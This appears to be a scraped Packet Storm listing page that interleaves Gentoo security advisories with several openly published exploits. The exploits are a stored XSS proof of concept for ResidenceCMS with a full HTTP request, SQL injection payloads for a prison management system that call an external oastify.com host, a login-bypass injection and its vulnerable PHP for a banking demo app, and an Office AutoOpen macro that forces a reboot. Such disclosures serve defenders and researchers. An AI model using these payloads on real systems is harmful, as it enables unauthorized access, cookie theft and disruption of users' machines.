Progress WhatsUp Gold SetAdminPassword local privilege escalation proof of concept exploit.

Progress WhatsUp Gold SetAdminPassword Privilege Escalation

Gentoo Linux Security Advisory 202407-21 - Multiple vulnerabilities have been discovered in the X.Org X11 library, the worst of which could lead to a denial of service. Versions greater than or equal to 1.8.7 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-21  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: X.Org X11 library: Multiple Vulnerabilities  
     Date: July 06, 2024  
     Bugs: #877461, #908549, #915129  
       ID: 202407-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in the X.Org X11 library,  
the worst of which could lead to a denial of service.

Background  
==========

X.Org is an implementation of the X Window System. The X.Org X11 library  
provides the X11 protocol library files.

Affected packages  
=================

Package          Vulnerable    Unaffected  
---------------  ------------  ------------  
x11-libs/libX11  < 1.8.7       >= 1.8.7

Description  
===========

Multiple vulnerabilities have been discovered in X.Org X11 library.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All X.Org X11 library users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-libs/libX11-1.8.7"

References  
==========

[ 1 ] CVE-2022-3554  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3554  
[ 2 ] CVE-2022-3555  
      https://nvd.nist.gov/vuln/detail/CVE-2022-3555  
[ 3 ] CVE-2023-3138  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3138  
[ 4 ] CVE-2023-43785  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43785  
[ 5 ] CVE-2023-43786  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43786  
[ 6 ] CVE-2023-43787  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43787

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-21

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-21

ResidenceCMS versions 2.10.1 and below suffer from a persistent cross site scripting vulnerability.

    # Exploit Title: ResidenceCMS <= 2.10.1 Stored Cross-Site Scripting via Content Form# Date: 8-7-2024# Category: Web Application# Exploit Author: Jeremia Geraldi Sihombing# Version: 2.10.1# Tested on: Windows# CVE: CVE-2024-39143Description:----------------A stored cross-site scripting (XSS) vulnerability exists in ResidenceCMS 2.10.1 that allows a low-privilege user to create malicious property content with HTML inside it, which acts as a stored XSS payload. If this property page is visited by anyone including the administrator, then the XSS payload will be triggered..Steps to reproduce-------------------------1. Login as a low privilege user with property edit capability.2. Create or Edit one of the user owned property (We can user the default property owned by the user).3. Fill the content form with XSS payload using the Code View feature. Before saving it make sure to go back using the usual view to see if the HTML is rendered or not.Vulnerable parameter name: property[property_description][content]Example Payload: <img src="x" onerror="alert(document.cookie)">4. After saving the new property content and clicking the 'Finish Editing', go to the page and see the XSS is triggered. It is possible to trigger the XSS by using any account or even unauthorized account.Burp Request-------------------POST /en/user/property/7/edit HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 1111Origin: http://localhostConnection: keep-aliveReferer: http://localhost/en/user/property/7/editCookie: REMEMBERME=App.Entity.User:dXNlcg~~:1722991344:s-spusttpMsLQb2wlzMc2GJcKATcKhGTfj1VuV8GOFA~dRl86I12JAEzbjfmLzxK4ps0tMcX9WH15-DfzD115EE~; PHPSESSID=fhp06bc4sc5i8p4fk5bt9petii; sidebar-toggled=falseUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Priority: u=1property[city]=3&property[district]=&property[neighborhood]=3&property[metro_station]=&property[dealType]=1&property[category]=1&property[bathrooms_number]=&property[bedrooms_number]=2&property[max_guests]=6&property[property_description][title]=Furnished renovated 2-bedroom 2-bathroom flat&property[property_description][meta_title]=&property[property_description][meta_description]=Furnished renovated 2-bedroom 2-bathroom flat&property[address]=5411 Bayshore Blvd, Tampa, FL 33611&property[latitude]=27.885095&property[longitude]=-82.486153&property[show_map]=1&property[price]=2200&property[price_type]=mo&property[features][]=1&property[features][]=2&property[features][]=4&property[features][]=6&property[features][]=8&property[property_description][content]=<img src="x" onerror="alert(document.domain)">&files=&property[_token]=09e8a0ac823.ahexkItiSa6gSwce8RFyNpn94Uqu9g1cc4CN6g-zLsE.PSHrpu87DJzVcjJ1smI1c8-VrjjGuHUGMefsg3XWdJcuL9_F2Cc_ncMsSg

ResidenceCMS 2.10.1 Cross Site Scripting

Gentoo Linux Security Advisory 202407-20 - A vulnerability has been discovered in KDE Plasma Workspaces, which can lead to privilege escalation. Versions greater than or equal to 5.27.11.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-20  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: KDE Plasma Workspaces: Privilege Escalation  
     Date: July 06, 2024  
     Bugs: #933342  
       ID: 202407-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in KDE Plasma Workspaces, which can  
lead to privilege escalation.

Background  
==========

KDE Plasma workspace is a widget based desktop environment designed to  
be fast and efficient.

Affected packages  
=================

Package                      Vulnerable    Unaffected  
---------------------------  ------------  ------------  
kde-plasma/plasma-workspace  < 5.27.11.1   >= 5.27.11.1

Description  
===========

Multiple vulnerabilities have been discovered in KDE Plasma Workspaces.  
Please review the CVE identifiers referenced below for details.

Impact  
======

KSmserver, KDE's XSMP manager, incorrectly allows connections via ICE  
based purely on the host, allowing all local connections. This allows  
another user on the same machine to gain access to the session  
manager.

A well crafted client could use the session restore feature to execute  
arbitrary code as the user on the next boot.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All KDE Plasma Workspaces users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=kde-plasma/plasma-workspace-5.27.11.1"

References  
==========

[ 1 ] CVE-2024-36041  
      https://nvd.nist.gov/vuln/detail/CVE-2024-36041

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-20

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-20

PMS 2024 version 1.0 suffers from a remote SQL injection vulnerability.

    ## Titles: PMS-2024 - PHP (by: oretnom23 ) v1.0 Multiple SQLi## Author: nu11secur1ty## Date: 07/06/2024## Vendor: https://github.com/oretnom23## Software:https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html## Reference: https://portswigger.net/web-security/sql-injection## Description:The id parameter appears to be vulnerable to SQL injection attacks. Thepayload '+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+' was submittedin the id parameter. This payload injects a SQL sub-query that callsMySQL's load_file function with a UNC file path that references a URL on anexternal domain. The application interacted with that domain, indicatingthat the injected SQL query was executed. The attacker can get allinformation from the system by using this vulnerability!STATUS: HIGH- Vulnerability[+]Exploits:- SQLi Multiple:```mysql---Parameter: id (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY orGROUP BY clause    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' RLIKE(SELECT (CASE WHEN (4671=4671) THEN 0x31+(selectload_file(0x5c5c5c5c307a30626468326b76746f69777070343933373379317376376d646a3164703473736b6661337a2e6f6173746966792e636f6d5c5c62646b))+''ELSE 0x28 END)) AND 'apSt'='apSt    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' ANDEXTRACTVALUE(4452,CONCAT(0x5c,0x71706b6271,(SELECT(ELT(4452=4452,1))),0x7171706a71)) AND 'SJhj'='SJhj    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: id=1'+(select load_file('\\\\0z0bdh2kvtoiwpp49373y1sv7mdj1dp4sskfa3z.oastify.com\\bdk'))+'' AND (SELECT6054 FROM (SELECT(SLEEP(7)))kXfT) AND 'mQNi'='mQNi---```## Reproduce:[href](https://www.patreon.com/posts/pms-php-by-v1-0-107584859)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/07/pms-php-by-oretnom23-v10-multiple-sqli.html)## Time spent:01:37:00

PMS 2024 1.0 SQL Injection

This whitepaper discusses eBPF technology in the Linux kernel and introduces the BPF Runtime Fuzzer (BRF), a fuzzer that can satisfy the semantics and dependencies required by the verifier and the eBPF subsystem.

BRF: eBPF Runtime Fuzzer

Gentoo Linux Security Advisory 202407-19 - Multiple vulnerabilities have been discovered in Mozilla Thunderbird, the worst of which could lead to remote code execution. Versions greater than or equal to 115.11.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-19  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Thunderbird: Multiple Vulnerabilities  
     Date: July 06, 2024  
     Bugs: #932375  
       ID: 202407-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird,  
the worst of which could lead to remote code execution.

Background  
==========

Mozilla Thunderbird is a popular open-source email client from the  
Mozilla project.

Affected packages  
=================

Package                      Vulnerable    Unaffected  
---------------------------  ------------  ------------  
mail-client/thunderbird      < 115.11.0    >= 115.11.0  
mail-client/thunderbird-bin  < 115.11.0    >= 115.11.0

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Thunderbird.  
Please review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Thunderbird binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-bin-115.11.0"

All Mozilla Thunderbird users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-115.11.0"

References  
==========

[ 1 ] CVE-2024-2609  
      https://nvd.nist.gov/vuln/detail/CVE-2024-2609  
[ 2 ] CVE-2024-3302  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3302  
[ 3 ] CVE-2024-3854  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3854  
[ 4 ] CVE-2024-3857  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3857  
[ 5 ] CVE-2024-3859  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3859  
[ 6 ] CVE-2024-3861  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3861  
[ 7 ] CVE-2024-3864  
      https://nvd.nist.gov/vuln/detail/CVE-2024-3864

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-19

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-19

Simple Online Banking System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Simple Online Banking System - SQLi (Authentication Bypass)# Date: 6 Jul, 2024# CVE: N/A# Exploit Author: bRpsd# Vendor Homepage: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html# Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html# Category: Web Application# Version: 1.0# Tested on: MacOS | XamppPOC:POST http://localhost/banking/classes/Login.php?f=loginHost: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, br, zstdContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 36Origin: http://localhostConnection: keep-aliveReferer: http://localhost/banking/admin/login.phpCookie: PHPSESSID=1472a7e8f9b230194b2515a42943f687Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originusername=A' OR 1=1#&password=123    Vuln code:/classes/Login.phpVuln parameter:username    public function login(){    extract($_POST);    $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");    if($qry->num_rows > 0){      foreach($qry->fetch_array() as $k => $v){        if(!is_numeric($k) && $k != 'password'){          $this->settings->set_userdata($k,$v);        }      }      $this->settings->set_userdata('login_type',1);    return json_encode(array('status'=>'success'));    }else{    return json_encode(array('status'=>'incorrect','last_qry'=>"SELECT * from users where username = '$username' and password = md5('$password') "));    }  }

Simple Online Banking System 1.0 SQL Injection

Gentoo Linux Security Advisory 202407-18 - A vulnerability has been discovered in Stellarium, which can lead to arbitrary file writes. Versions greater than or equal to 23.1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202407-18  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Stellarium: Arbitrary File Write  
     Date: July 05, 2024  
     Bugs: #905300  
       ID: 202407-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in Stellarium, which can lead to  
arbitrary file writes.

Background  
==========

Stellarium is a free open source planetarium for your computer. It shows  
a realistic sky in 3D, just like what you see with the naked eye,  
binoculars or a telescope.

Affected packages  
=================

Package                   Vulnerable    Unaffected  
------------------------  ------------  ------------  
sci-astronomy/stellarium  < 23.1        >= 23.1

Description  
===========

A vulnerability has been discovered in Stellarium. Please review the CVE  
identifier referenced below for details.

Impact  
======

Attackers can write to files that are typically unintended, such as ones  
with absolute pathnames or .. directory traversal.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Stellarium users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sci-astronomy/stellarium-23.1"

References  
==========

[ 1 ] CVE-2023-28371  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28371

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202407-18

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202407-18

Microsoft Office 365 appears susceptible to macro code execution that can result in remote code execution.

    ### [CVE-2024-30104](https://attackerkb.com/contributors/nu11secur1ty)The problem is still in the "docx" files this vulnerability is a 0 daybased on the Follina exploit. The Microsoft company still doesn't wantto understand, that they MUST remove macros options from the 365Office and their offline app. In this video, you will see an exampleof this, how some users can be trickery to open the malicious filethat is sent to them by the attacker. After execution of the file, thething will be very bad for the users who execute it on their computer.It depends of the scenario.### The exploit:```vbsSub AutoOpen()Dim Program As StringDim TaskID As DoubleOn Error Resume NextProgram = "shutdown /R"TaskID = Shell(Program, 1)If Err <> 0 ThenMsgBox "Can't start " & ProgramEnd IfEnd Sub```- Enjoy watching### PoC:[video](https://www.patreon.com/posts/cve-2024-30104-107163015)

Source

Packet Storm